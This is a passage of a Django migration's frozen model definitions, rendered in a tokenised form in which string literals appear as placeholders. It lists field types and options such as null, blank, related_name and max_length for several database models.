'<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:time>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : 